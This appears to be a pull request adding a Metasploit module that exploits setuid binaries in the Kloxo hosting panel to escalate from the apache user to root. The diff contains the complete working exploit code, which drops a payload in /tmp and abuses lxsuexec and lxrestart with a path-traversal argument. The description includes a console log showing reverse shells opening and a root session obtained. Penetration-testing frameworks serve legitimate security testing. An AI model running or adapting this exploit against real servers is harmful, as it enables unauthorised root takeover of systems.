### PR TITLE
Added module for EDB 25406

### DIFF
--- a/modules/exploits/linux/local/kloxo_lxsuexec.rb
+++ b/modules/exploits/linux/local/kloxo_lxsuexec.rb
@@ -24,10 +24,10 @@ class Metasploit4 < Msf::Exploit::Local
 		super(update_info(info, {
 			'Name'          => 'Kloxo Local Privilege Escalation',
 			'Description'   => %q{
-					Version 6.1.6, and probably others, of Kloxo include two setuid root
-				binaries, named lxsuexec and lxrestart, which together allows local privilege
-				escalation to root from the uid 48, apache by default on CentOS 5.8, the
-				operating system supported by Kloxo.
+					Version 6.1.12 and earlier of Kloxo include two setuid root binaries, named
+				lxsuexec and lxrestart, which together allows local privilege escalation to root
+				from the uid 48, apache by default on CentOS 5.8, the operating system supported
+				by Kloxo. This module has bene tested successfully with Kloxo 6.1.12 and 6.1.6.
 			},
 			'License'       => MSF_LICENSE,
 			'Author'        =>
@@ -50,7 +50,7 @@ class Metasploit4 < Msf::Exploit::Local
 				],
 			'Targets'       =>
 				[
-					[ 'Kloxo 6.1.6', {} ]
+					[ 'Kloxo 6.1.12', {} ]
 				],
 			'DefaultOptions' =>
 				{

--- a/modules/exploits/linux/local/kloxo_lxsuexec.rb
+++ b/modules/exploits/linux/local/kloxo_lxsuexec.rb
@@ -1,0 +1,111 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'rex'
+require 'msf/core/post/common'
+require 'msf/core/exploit/local/linux'
+require 'msf/core/exploit/exe'
+
+class Metasploit4 < Msf::Exploit::Local
+
+	include Msf::Exploit::EXE
+	include Msf::Post::File
+	include Msf::Post::Common
+	include Msf::Exploit::FileDropper
+
+	include Msf::Exploit::Local::Linux
+
+	def initialize(info={})
+		super(update_info(info, {
+			'Name'          => 'Kloxo Local Privilege Escalation',
+			'Description'   => %q{
+					Version 6.1.6, and probably others, of Kloxo include two setuid root
+				binaries, named lxsuexec and lxrestart, which together allows local privilege
+				escalation to root from the uid 48, apache by default on CentOS 5.8, the
+				operating system supported by Kloxo.
+			},
+			'License'       => MSF_LICENSE,
+			'Author'        =>
+				[
+					'HTP', # Original PoC according to exploit-db
+					'juan vazquez' # Metasploit module
+				],
+			'Platform'      => [ 'linux' ],
+			'Arch'          => [ ARCH_X86 ],
+			'SessionTypes'  => [ 'shell' ],
+			'Payload'		=>
+				{
+					'Space'     => 8000,
+					'DisableNops' => true
+				},
+			'References'    =>
+				[
+					[ 'EDB', '25406' ],
+					[ 'URL', 'http://roothackers.net/showthread.php?tid=92' ] # post referencing the vulnerability and PoC
+				],
+			'Targets'       =>
+				[
+					[ 'Kloxo 6.1.6', {} ]
+				],
+			'DefaultOptions' =>
+				{
+					'PrependSetuid'    => true
+				},
+			'DefaultTarget' => 0,
+			'Privileged'     => true,
+			'DisclosureDate' => "Sep 18 2012"
+		}))
+	end
+
+	def exploit
+		# apache uid (48) is needed in order to abuse the setuid lxsuexec binary
+		# .text:0804869D                 call    _getuid
+		# .text:080486A2                 cmp     eax, 48
+		# .text:080486A5                 jz      short loc_80486B6 // uid == 48 (typically apache on CentOS)
+		# .text:080486A7                 mov     [ebp+var_A4], 0Ah
+		# .text:080486B1                 jmp     loc_8048B62 // finish if uid != 48
+		# .text:08048B62 loc_8048B62:                           ; CODE XREF: main+39j
+		#.text:08048B62                                         ; main+B0j
+		#.text:08048B62                 mov     eax, [ebp+var_A4]
+		#.text:08048B68                 add     esp, 0ECh
+		#.text:08048B6E                 pop     ecx
+		#.text:08048B6F                 pop     esi
+		#.text:08048B70                 pop     edi
+		#.text:08048B71                 pop     ebp
+		#.text:08048B72                 lea     esp, [ecx-4]
+		#.text:08048B75                 retn
+		#.text:08048B75 main            endp
+		print_status("Checking actual uid...")
+		id = cmd_exec("id -u")
+		if id != "48"
+			fail_with(Exploit::Failure::NoAccess, "You are uid #{id}, you must be uid 48(apache) to exploit this")
+		end
+
+		# Write msf payload to /tmp and give provide executable perms
+		pl = generate_payload_exe
+		payload_path = "/tmp/#{rand_text_alpha(4)}"
+		print_status("Writing payload executable (#{pl.length} bytes) to #{payload_path} ...")
+		write_file(payload_path, pl)
+		register_file_for_cleanup(payload_path)
+
+		# Profit
+		print_status("Exploiting...")
+		cmd_exec("chmod +x #{payload_path}")
+		cmd_exec("LXLABS=`cat /etc/passwd | grep lxlabs | cut -d: -f3`")
+		cmd_exec("export MUID=$LXLABS")
+		cmd_exec("export GID=$LXLABS")
+		cmd_exec("export TARGET=/bin/sh")
+		cmd_exec("export CHECK_GID=0")
+		cmd_exec("export NON_RESIDENT=1")
+		helper_path = "/tmp/#{rand_text_alpha(4)}"
+		write_file(helper_path, "/usr/sbin/lxrestart '../../..#{payload_path} #'")
+		register_file_for_cleanup(helper_path)
+		cmd_exec("lxsuexec #{helper_path}")
+	end
+
+end


### PR DESCRIPTION
Tested with Kloxo 6.1.6 on CentOS 5.8. Privilege escalation from apache (only!) to root:

```
msf exploit(kloxo_lxsuexec) > use exploit/multi/handler 
msf exploit(handler) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] Starting the payload handler...
[*] Sending stage (36 bytes) to 192.168.172.194
[*] Command shell session 5 opened (192.168.172.1:4444 -> 192.168.172.194:52149) at 2013-05-13 17:33:56 -0500

^Z
Background session 5? [y/N]  y
msf exploit(handler) > use exploit/linux/local/kloxo_lxsuexec 
msf exploit(kloxo_lxsuexec) > set session 5
session => 5
msf exploit(kloxo_lxsuexec) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.0.5:4444 
[*] Checking actual uid...
[*] Writing payload executable (259 bytes) to /tmp/tnUZ
[*] Exploiting...
[*] Command shell session 6 opened (192.168.0.5:4444 -> 192.168.0.5:63231) at 2013-05-13 17:34:27 -0500
[+] Deleted /tmp/tnUZ
[+] Deleted /tmp/NdyC

663568205
BhNHLZjiqXPBxrVjkLEBqLKKwwtiyuKm
/bin//sh: line 3: attrib.exe: command not found
/bin//sh: line 3: del.exe: command not found
hrndyjUCocwvRupOxnthsNJSgVNKQdEZ
/bin//sh: line 5: attrib.exe: command not found
/bin//sh: line 5: del.exe: command not found
mOFwjLvJuqHyyPHeFEWxkRkgEiOyNzei
id
uid=0(root) gid=0(root)
^C
Abort session 6? [y/N]  y

[*] 192.168.0.5 - Command shell session 6 closed.  Reason: User exit

msf exploit(kloxo_lxsuexec) > sessions -i 5
[*] Starting interaction with 5...

33281788
dVmJOXmpZuRhFFrkyUFpvcVBZJUeUbAI
48
ckHGeAxkonxAZoWHhJxUzXjaITvvNhhO
65537
ZkFsUiopaOOHBaaxJYPsSJClHxilinWP
??ABCD%%
BBpyGaacNShNdLwQGeYkZVRMYVVjCMne
qNYtLOiawweNxUzFvcTuuvacSFxPgahd
hPXZgfkmigJeswTRRWdlCDMzOZzyTPeY
HGNjxMqGitHhOizfIVHyTmvuICtdNpGs
AYoWvfSgBZkCIXixbLdxaNiWpUyAxwBU
ZAFRZoaBgYSxKphuKltlMwIHkdHFivDC
JoYVdKWFMAsSfTDGWAxZjRlkznirfGDo
JBVwHQmegjLNnOdkUGDFfPcMiJVkxEIX
SnfQRaBVYIhyAvKdLPvFPEeoWowLIDyU
65537
AtmMuUroBLJykmcDmlRxOGPeOdETSKrA
??ABCD%%
NMaJCPfRGWVaULkmFknDPtUQRYNBtDtc
OUOhKkEGCmnFulcVtblEKlwXqGfSdNlz
UNPavyFDlYhXUbATUOdKiBGmWxLrAjuj
id
uid=48(apache) gid=48(apache) groups=48(apache)


```
